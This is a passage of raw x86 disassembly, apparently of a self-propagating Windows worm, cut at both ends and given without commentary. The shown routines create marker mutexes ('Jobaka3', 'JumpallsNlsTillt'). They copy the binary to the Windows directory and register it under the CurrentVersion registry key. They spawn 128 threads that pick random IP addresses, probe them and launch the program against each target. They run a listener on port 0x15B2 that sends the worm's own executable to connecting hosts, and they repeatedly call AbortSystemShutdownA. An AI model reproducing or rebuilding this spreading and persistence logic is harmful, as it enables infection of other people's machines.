call sub_402210
pop ecx
push eax
push ds:off_4068E4
push ebx
call esi ; send
lea eax, [ebp+var_60]
push eax
call sub_4011D5
mov ebx, eax
pop ecx
test ebx, ebx
jz loc_401DB9
push 10h
lea eax, [ebp+var_28]
push 0
push eax
call sub_4021B0
add esp, 0Ch
mov [ebp+var_28], 2
push edi
call ds:dword_4050F4 ; ntohs
push 0
push 1
push 2
mov [ebp+var_26], ax
mov [ebp+var_24], ebx
call ds:dword_4050F8 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
mov [ebp+var_C], ebx
jz loc_401DB9
lea eax, [ebp+var_28]
push 10h
push eax
push ebx
call ds:dword_4050FC ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_401D44
push ebx
call ds:dword_40511C ; closesocket
jmp short loc_401DB9
; ---------------------------------------------------------------------------
loc_401D44: ; CODE XREF: sub_401B08+231�j
lea eax, [ebp+var_8E4]
push 400h
push eax
push 0
call ds:dword_405034 ; GetModuleFileNameA
lea eax, [ebp+var_8E4]
push 0
push eax
call ds:dword_405030 ; _lopen
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jz short loc_401DB9
lea eax, [ebp+var_2]
push offset dword_406F38
push eax
call sub_402720
mov ebx, ds:dword_40502C
pop ecx
pop ecx
lea eax, [ebp+var_2]
push 1
push eax
push [ebp+var_8]
loc_401D8E: ; CODE XREF: sub_401B08+2A6�j
call ebx ; _lread
cmp eax, 1
jnz short loc_401DB0
and [ebp+var_1], 0
push 0
push eax
lea eax, [ebp+var_2]
push eax
push [ebp+var_C]
call esi ; send
lea eax, [ebp+var_2]
push 1
push eax
push [ebp+var_8]
jmp short loc_401D8E
; ---------------------------------------------------------------------------
loc_401DB0: ; CODE XREF: sub_401B08+28B�j
push [ebp+var_8]
call ds:dword_40501C ; _lclose
loc_401DB9: ; CODE XREF: sub_401B08+1DD�j
; sub_401B08+21B�j ...
push [ebp+var_C]
call ds:dword_40511C ; closesocket
push 0
push ds:off_4068DC
call sub_402210
pop ecx
push eax
push ds:off_4068DC
loc_401DD7: ; CODE XREF: sub_401B08+197�j
push [ebp+arg_0]
jmp short loc_401E12
; ---------------------------------------------------------------------------
loc_401DDC: ; CODE XREF: sub_401B08+1B1�j
lea eax, [ebp+var_4E4]
push offset aQuit ; "QUIT"
push eax
call sub_402600
pop ecx
test eax, eax
pop ecx
jz short loc_401DFC
push ebx
call ds:dword_40511C ; closesocket
jmp short loc_401E14
; ---------------------------------------------------------------------------
loc_401DFC: ; CODE XREF: sub_401B08+2E9�j
push 0
push ds:off_4068DC
call sub_402210
pop ecx
push eax
push ds:off_4068DC
loc_401E11: ; CODE XREF: sub_401B08+8A�j
; sub_401B08+BB�j
push ebx
loc_401E12: ; CODE XREF: sub_401B08+2D2�j
call esi ; send
loc_401E14: ; CODE XREF: sub_401B08+2F2�j
cmp [ebp+var_10], 0
jg loc_401B43
push [ebp+arg_0]
call ds:dword_40511C ; closesocket
pop edi
pop esi
loc_401E29: ; CODE XREF: sub_401B08+10�j
xor eax, eax
pop ebx
leave
retn 4
sub_401B08 endp
; =============== S U B R O U T I N E =======================================
sub_401E30 proc near ; CODE XREF: sub_401B08+119�p
; sub_401B08+129�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
xor edi, edi
loc_401E38: ; CODE XREF: sub_401E30+13�j
mov al, [esi]
cmp al, 20h
jz short loc_401E42
cmp al, 9
jnz short loc_401E45
loc_401E42: ; CODE XREF: sub_401E30+C�j
inc esi
jmp short loc_401E38
; ---------------------------------------------------------------------------
loc_401E45: ; CODE XREF: sub_401E30+10�j
; sub_401E30+2E�j
movsx eax, byte ptr [esi]
push eax
call sub_402810
test eax, eax
pop ecx
jz short loc_401E60
movsx ecx, byte ptr [esi]
lea eax, [edi+edi*4]
inc esi
lea edi, [ecx+eax*2-30h]
jmp short loc_401E45
; ---------------------------------------------------------------------------
loc_401E60: ; CODE XREF: sub_401E30+21�j
mov eax, edi
pop edi
pop esi
retn
sub_401E30 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401E65 proc near ; DATA XREF: sub_402029+79�o
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 14h
push esi
xor esi, esi
push edi
push esi
push 1
push 2
call ds:dword_4050F8 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_401E89
loc_401E81: ; CODE XREF: sub_401E65+63�j
pop edi
xor eax, eax
pop esi
leave
retn 4
; ---------------------------------------------------------------------------
loc_401E89: ; CODE XREF: sub_401E65+1A�j
push 15B2h
mov [ebp+var_14], 2
call ds:dword_4050F4 ; ntohs
mov [ebp+var_12], ax
lea eax, [ebp+var_14]
push 10h
push eax
push edi
mov [ebp+var_10], esi
call ds:dword_405118 ; bind
cmp eax, 0FFFFFFFFh
jz short loc_401EC1
push 5
push edi
call ds:dword_405100 ; listen
cmp eax, 0FFFFFFFFh
jnz short loc_401ECA
loc_401EC1: ; CODE XREF: sub_401E65+4C�j
push edi
call ds:dword_40511C ; closesocket
jmp short loc_401E81
; ---------------------------------------------------------------------------
loc_401ECA: ; CODE XREF: sub_401E65+5A�j
; sub_401E65+89�j
push esi
push esi
push edi
call ds:dword_4050E8 ; accept
lea ecx, [ebp+var_4]
push ecx
push esi
push eax
push offset sub_401B08
push esi
push esi
call ds:dword_405038 ; CreateThread
push 19h
call ds:dword_405028 ; Sleep
jmp short loc_401ECA
sub_401E65 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_401EF0 proc near ; DATA XREF: sub_402029+8D�o
var_454 = byte ptr -454h
var_438 = byte ptr -438h
var_400 = byte ptr -400h
sub esp, 454h
push ebx
push ebp
mov ebp, ds:dword_4050E0
push esi
push edi
mov esi, 0FFh
loc_401F05: ; CODE XREF: sub_401EF0+134�j
lea eax, [esp+464h+var_438]
push eax
call sub_4010D2
pop ecx
lea eax, [esp+464h+var_438]
push eax
call ds:dword_40510C ; inet_addr
movsx edi, al
test edi, edi
movsx ebx, ah
jge short loc_401F2B
add edi, 100h
loc_401F2B: ; CODE XREF: sub_401EF0+33�j
test ebx, ebx
jge short loc_401F35
add ebx, 100h
loc_401F35: ; CODE XREF: sub_401EF0+3D�j
call sub_401000
push 1Fh
cdq
pop ecx
idiv ecx
cmp edx, 0Fh
jle short loc_401F92
call sub_401000
push 1Fh
cdq
pop ecx
idiv ecx
cmp edx, 0Fh
jle short loc_401F78
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
jmp short loc_401F8F
; ---------------------------------------------------------------------------
loc_401F78: ; CODE XREF: sub_401EF0+63�j
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
push ebx
loc_401F8F: ; CODE XREF: sub_401EF0+86�j
push edi
jmp short loc_401FBE
; ---------------------------------------------------------------------------
loc_401F92: ; CODE XREF: sub_401EF0+53�j
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
loc_401FBE: ; CODE XREF: sub_401EF0+A0�j
lea eax, [esp+474h+var_454]
push offset aI_I_I_I ; "%i.%i.%i.%i"
push eax
call ebp ; wsprintfA
add esp, 18h
lea eax, [esp+464h+var_454]
push eax
call sub_401153
cmp al, 1
pop ecx
jnz short loc_40201C
lea eax, [esp+464h+var_400]
push 400h
push eax
push 0
call ds:dword_405034 ; GetModuleFileNameA
lea eax, [esp+464h+var_400]
push offset asc_406A7C ; " "
push eax
call sub_402730
lea eax, [esp+46Ch+var_454]
push eax
lea eax, [esp+470h+var_400]
push eax
call sub_402730
add esp, 10h
lea eax, [esp+464h+var_400]
push 0
push eax
call ds:dword_40503C ; WinExec
loc_40201C: ; CODE XREF: sub_401EF0+EA�j
push 19h
call ds:dword_405028 ; Sleep
jmp loc_401F05
sub_401EF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402029 proc near ; CODE XREF: sub_40283E+C9�p
var_14 = dword ptr -14h
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push edi
mov edi, ds:dword_405048
xor esi, esi
push offset aJobaka3 ; "Jobaka3"
push esi
push esi
call edi ; CreateMutexA
call ds:dword_405044 ; GetTickCount
push eax
call sub_40101E
call sub_401028
push [ebp+arg_8]
call sub_402210
pop ecx
test eax, eax
pop ecx
jbe short loc_402072
push [ebp+arg_8]
call sub_401A84
pop ecx
push 1
pop eax
loc_40206C: ; CODE XREF: sub_402029+6A�j
pop edi
pop esi
leave
retn 10h
; ---------------------------------------------------------------------------
loc_402072: ; CODE XREF: sub_402029+35�j
push 1
call sub_4020D7
mov [esp+14h+var_14], offset aJumpallsnlstil ; "JumpallsNlsTillt"
push esi
push esi
call edi ; CreateMutexA
call ds:dword_405040 ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_402095
xor eax, eax
jmp short loc_40206C
; ---------------------------------------------------------------------------
loc_402095: ; CODE XREF: sub_402029+66�j
mov edi, ds:dword_405038
lea eax, [ebp+var_4]
push ebx
push eax
push esi
push esi
push offset sub_401E65
push esi
push esi
call edi ; CreateThread
mov ebx, 80h
loc_4020B0: ; CODE XREF: sub_402029+97�j
lea eax, [ebp+var_8]
push eax
push esi
push esi
push offset sub_401EF0
push esi
push esi
call edi ; CreateThread
dec ebx
jnz short loc_4020B0
pop ebx
loc_4020C3: ; CODE XREF: sub_402029+AC�j
push esi
call ds:dword_405000 ; AbortSystemShutdownA
push 0BB8h
call ds:dword_405028 ; Sleep
jmp short loc_4020C3
sub_402029 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4020D7 proc near ; CODE XREF: sub_402029+4B�p
var_824 = byte ptr -824h
var_425 = byte ptr -425h
var_424 = byte ptr -424h
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 824h
push esi
mov esi, 400h
lea eax, [ebp+var_824]
push esi
push eax
push 0
call ds:dword_405034 ; GetModuleFileNameA
lea eax, [ebp+var_424]
push esi
push eax
call ds:dword_405050 ; GetWindowsDirectoryA
lea eax, [ebp+var_424]
push eax
call sub_402210
cmp [ebp+eax+var_425], 5Ch
pop ecx
pop esi
jz short loc_40212F
lea eax, [ebp+var_424]
push offset asc_406ACC ; "\\"
push eax
call sub_402730
pop ecx
pop ecx
loc_40212F: ; CODE XREF: sub_4020D7+43�j
push ds:off_4068C8
lea eax, [ebp+var_424]
push eax
call sub_402730
cmp [ebp+arg_0], 0
pop ecx
pop ecx
jz short loc_40215F
lea eax, [ebp+var_424]
push 0
push eax
lea eax, [ebp+var_824]
push eax
call ds:dword_40504C ; CopyFileA
loc_40215F: ; CODE XREF: sub_4020D7+70�j
lea eax, [ebp+var_4]
push eax
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call ds:dword_405004 ; RegOpenKeyA
lea eax, [ebp+var_424]
push eax
call sub_402210
pop ecx
push eax
lea eax, [ebp+var_424]
push eax
push 1
push 0
push ds:off_4068C8
push [ebp+var_4]
call ds:dword_405008 ; RegSetValueExA
push [ebp+var_4]
call ds:dword_40500C ; RegCloseKey
leave
retn
sub_4020D7 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4021B0 proc near ; CODE XREF: sub_401153+10�p
; sub_401153+40�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_402203
xor eax, eax
mov al, [esp+arg_4]
push edi
mov edi, ecx
cmp edx, 4
jb short loc_4021F7
neg ecx
and ecx, 3
jz short loc_4021D9
sub edx, ecx
loc_4021D3: ; CODE XREF: sub_4021B0+27�j
mov [edi], al
inc edi
dec ecx
jnz short loc_4021D3
loc_4021D9: ; CODE XREF: sub_4021B0+1F�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_4021F7
rep stosd
test edx, edx
jz short loc_4021FD
loc_4021F7: ; CODE XREF: sub_4021B0+18�j
; sub_4021B0+3F�j ...
mov [edi], al
inc edi
dec edx
jnz short loc_4021F7
loc_4021FD: ; CODE XREF: sub_4021B0+45�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_402203: ; CODE XREF: sub_4021B0+A�j
mov eax, [esp+arg_0]
retn
sub_4021B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402210 proc near ; CODE XREF: sub_401210+3E�p
; sub_401210+55�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test ecx, 3
jz short loc_402230
loc_40221C: ; CODE XREF: sub_402210+19�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_402263
test ecx, 3
jnz short loc_40221C
add eax, 0
loc_402230: ; CODE XREF: sub_402210+A�j
; sub_402210+36�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_402230
mov eax, [ecx-4]
test al, al
jz short loc_402281
test ah, ah
jz short loc_402277
test eax, 0FF0000h
jz short loc_40226D
test eax, 0FF000000h
jz short loc_402263
jmp short loc_402230
; ---------------------------------------------------------------------------
loc_402263: ; CODE XREF: sub_402210+11�j
; sub_402210+4F�j
lea eax, [ecx-1]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_40226D: ; CODE XREF: sub_402210+48�j
lea eax, [ecx-2]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_402277: ; CODE XREF: sub_402210+41�j
lea eax, [ecx-3]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_402281: ; CODE XREF: sub_402210+3D�j
lea eax, [ecx-4]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
sub_402210 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402290 proc near ; CODE XREF: sub_401398+59�p
; sub_401398+78�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_4022B0
cmp edi, eax
jb loc_402428
loc_4022B0: ; CODE XREF: sub_402290+16�j
test edi, 3
jnz short loc_4022CC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_4022EC
rep movsd
jmp ds:off_4023D8[edx*4]
; ---------------------------------------------------------------------------
loc_4022CC: ; CODE XREF: sub_402290+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_4022E4
and eax, 3
add ecx, eax
jmp dword ptr ds:loc_4022EC+4[eax*4]
; ---------------------------------------------------------------------------
loc_4022E4: ; CODE XREF: sub_402290+46�j
jmp dword ptr ds:loc_4023E8[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_4022EC: ; CODE XREF: sub_402290+31�j
; sub_402290+8E�j ...
jmp ds:off_40236C[ecx*4]
; ---------------------------------------------------------------------------
db 90h
dd offset loc_402300
dd offset loc_40232C
; ---------------------------------------------------------------------------
push eax
and eax, [eax+0]
loc_402300: ; DATA XREF: sub_402290+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_4022EC
rep movsd
jmp ds:off_4023D8[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_40232C: ; DATA XREF: sub_402290+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_4022EC
rep movsd
jmp ds:off_4023D8[edx*4]
; ---------------------------------------------------------------------------
align 10h
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_4022EC
rep movsd
jmp ds:off_4023D8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_40236C dd offset loc_4023CF ; DATA XREF: sub_402290:loc_4022EC�r
dd offset loc_4023BC
dd offset loc_4023B4
dd offset loc_4023AC
dd offset loc_4023A4
dd offset loc_40239C
dd offset loc_402394
dd offset loc_40238C
; ---------------------------------------------------------------------------
loc_40238C: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_402394: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_40239C: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_4023A4: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_4023AC: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_4023B4: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_4023BC: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_4023CF: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290:off_40236C�o
jmp ds:off_4023D8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_4023D8 dd offset loc_4023E8 ; DATA XREF: sub_402290+35�r
; sub_402290+92�r ...
dd offset loc_4023F0
dd offset loc_4023FC
dd offset loc_402410
; ---------------------------------------------------------------------------
loc_4023E8: ; CODE XREF: sub_402290+35�j
; sub_402290+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_4023F0: ; CODE XREF: sub_402290+35�j
; sub_402290+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4023FC: ; CODE XREF: sub_402290+35�j
; sub_402290+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_402410: ; CODE XREF: sub_402290+35�j
; sub_402290+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_402428: ; CODE XREF: sub_402290+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_40245C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_402450
std
rep movsd
cld
jmp ds:off_402570[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_402450: ; CODE XREF: sub_402290+1B1�j
; sub_402290+208�j ...
neg ecx
jmp ds:off_402520[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_40245C: ; CODE XREF: sub_402290+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_402474
and eax, 3
sub ecx, eax
jmp dword ptr ds:loc_402474+4[eax*4]
; ---------------------------------------------------------------------------
loc_402474: ; CODE XREF: sub_402290+1D6�j
; DATA XREF: sub_402290+1DD�r
jmp ds:off_402570[ecx*4]
; ---------------------------------------------------------------------------
align 4
mov [eax+eax*2], ah
add [eax-2FFFBFDCh], ch
and al, 40h
add [edx-2EDCFCBAh], cl
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_402450
std
rep movsd
cld
jmp ds:off_402570[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_402450
std
rep movsd
cld
jmp ds:off_402570[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_402450
std
rep movsd
cld
jmp ds:off_402570[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_402524
dd offset loc_40252C
dd offset loc_402534
dd offset loc_40253C
dd offset loc_402544
dd offset loc_40254C
dd offset loc_402554
off_402520 dd offset loc_402567 ; DATA XREF: sub_402290+1C2�r
; ---------------------------------------------------------------------------
loc_402524: ; DATA XREF: sub_402290+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_40252C: ; DATA XREF: sub_402290+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_402534: ; DATA XREF: sub_402290+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_40253C: ; DATA XREF: sub_402290+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_402544: ; DATA XREF: sub_402290+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_40254C: ; DATA XREF: sub_402290+288�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_402554: ; DATA XREF: sub_402290+28C�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_402567: ; CODE XREF: sub_402290+1C2�j
; DATA XREF: sub_402290:off_402520�o
jmp ds:off_402570[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_402570 dd offset loc_402580 ; DATA XREF: sub_402290+1B7�r
; sub_402290:loc_402474�r ...
dd offset loc_402588
dd offset loc_402598
dd offset loc_4025AC
; ---------------------------------------------------------------------------
loc_402580: ; CODE XREF: sub_402290+1B7�j
; sub_402290:loc_402474�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_402588: ; CODE XREF: sub_402290+1B7�j
; sub_402290:loc_402474�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_402598: ; CODE XREF: sub_402290+1B7�j
; sub_402290:loc_402474�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4025AC: ; CODE XREF: sub_402290+1B7�j
; sub_402290:loc_402474�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_402290 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4025D0 proc near ; CODE XREF: sub_40159E+8�p
; sub_40371C+DF�p ...
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_4025F0
loc_4025DC: ; CODE XREF: sub_4025D0+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_4025DC
loc_4025F0: ; CODE XREF: sub_4025D0+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_4025D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402600 proc near ; CODE XREF: sub_401A84+2D�p
; sub_401A84+50�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push edi
push ebx
push esi
mov dl, [ecx]
mov edi, [esp+0Ch+arg_0]
test dl, dl
jz short loc_40267A
mov dh, [ecx+1]
test dh, dh
jz short loc_402667
loc_402618: ; CODE XREF: sub_402600+52�j
; sub_402600+65�j
mov esi, edi
mov ecx, [esp+0Ch+arg_4]
mov al, [edi]
inc esi
cmp al, dl
jz short loc_40263A
test al, al
jz short loc_402634
loc_402629: ; CODE XREF: sub_402600+32�j
mov al, [esi]
inc esi
loc_40262C: ; CODE XREF: sub_402600+3F�j
cmp al, dl
jz short loc_40263A
test al, al
jnz short loc_402629
loc_402634: ; CODE XREF: sub_402600+27�j
pop esi
pop ebx
pop edi
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_40263A: ; CODE XREF: sub_402600+23�j
; sub_402600+2E�j
mov al, [esi]
inc esi
cmp al, dh
jnz short loc_40262C
lea edi, [esi-1]
loc_402644: ; CODE XREF: sub_402600+63�j
mov ah, [ecx+2]
test ah, ah
jz short loc_402673
mov al, [esi]
add esi, 2
cmp al, ah
jnz short loc_402618
mov al, [ecx+3]
test al, al
jz short loc_402673
mov ah, [esi-1]
add ecx, 2
cmp al, ah
jz short loc_402644
jmp short loc_402618
; ---------------------------------------------------------------------------
loc_402667: ; CODE XREF: sub_402600+16�j
xor eax, eax
pop esi
pop ebx
pop edi
mov al, dl
jmp sub_402996
; ---------------------------------------------------------------------------
loc_402673: ; CODE XREF: sub_402600+49�j
; sub_402600+59�j
lea eax, [edi-1]
pop esi
pop ebx
pop edi
retn
; ---------------------------------------------------------------------------
loc_40267A: ; CODE XREF: sub_402600+F�j
mov eax, edi
pop esi
pop ebx
pop edi
retn
sub_402600 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402680 proc near ; CODE XREF: sub_401B08+103�p
; sub_401B08+14C�p
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
push 8
xor eax, eax
pop ecx
lea edi, [ebp+var_20]
rep stosd
push 7
pop edi
loc_402699: ; CODE XREF: sub_402680+32�j
mov dl, [esi]
mov bl, 1
movzx ecx, dl
mov eax, ecx
and ecx, edi
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_20]
or [eax], bl
inc esi
test dl, dl
jnz short loc_402699
mov edx, [ebp+arg_0]
test edx, edx
jnz short loc_4026C1
mov edx, ds:dword_406F3C
loc_4026C1: ; CODE XREF: sub_402680+39�j
; sub_402680+5F�j
mov al, [edx]
push 1
movzx esi, al
mov ecx, esi
pop ebx
and ecx, edi
shl ebx, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test bl, cl
jz short loc_4026E1
test al, al
jz short loc_4026E1
inc edx
jmp short loc_4026C1
; ---------------------------------------------------------------------------
loc_4026E1: ; CODE XREF: sub_402680+58�j
; sub_402680+5C�j
mov ebx, edx
loc_4026E3: ; CODE XREF: sub_402680+81�j
mov al, [edx]
test al, al
jz short loc_402707
movzx esi, al
mov ecx, esi
push 1
and ecx, edi
pop eax
shl eax, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test al, cl
jnz short loc_402703
inc edx
jmp short loc_4026E3
; ---------------------------------------------------------------------------
loc_402703: ; CODE XREF: sub_402680+7E�j
and byte ptr [edx], 0
inc edx
loc_402707: ; CODE XREF: sub_402680+67�j
mov eax, ebx
pop edi
sub eax, edx
pop esi
neg eax
sbb eax, eax
mov ds:dword_406F3C, edx
and eax, ebx
pop ebx
leave
retn
sub_402680 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402720 proc near ; CODE XREF: sub_401B08+E9�p
; sub_401B08+270�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
jmp short loc_402791
sub_402720 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402730 proc near ; CODE XREF: sub_401EF0+108�p
; sub_401EF0+117�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
push edi
test ecx, 3
jz short loc_40274C
loc_40273D: ; CODE XREF: sub_402730+1A�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_40277F
test ecx, 3
jnz short loc_40273D
loc_40274C: ; CODE XREF: sub_402730+B�j
; sub_402730+32�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_40274C
mov eax, [ecx-4]
test al, al
jz short loc_40278E
test ah, ah
jz short loc_402789
test eax, 0FF0000h
jz short loc_402784
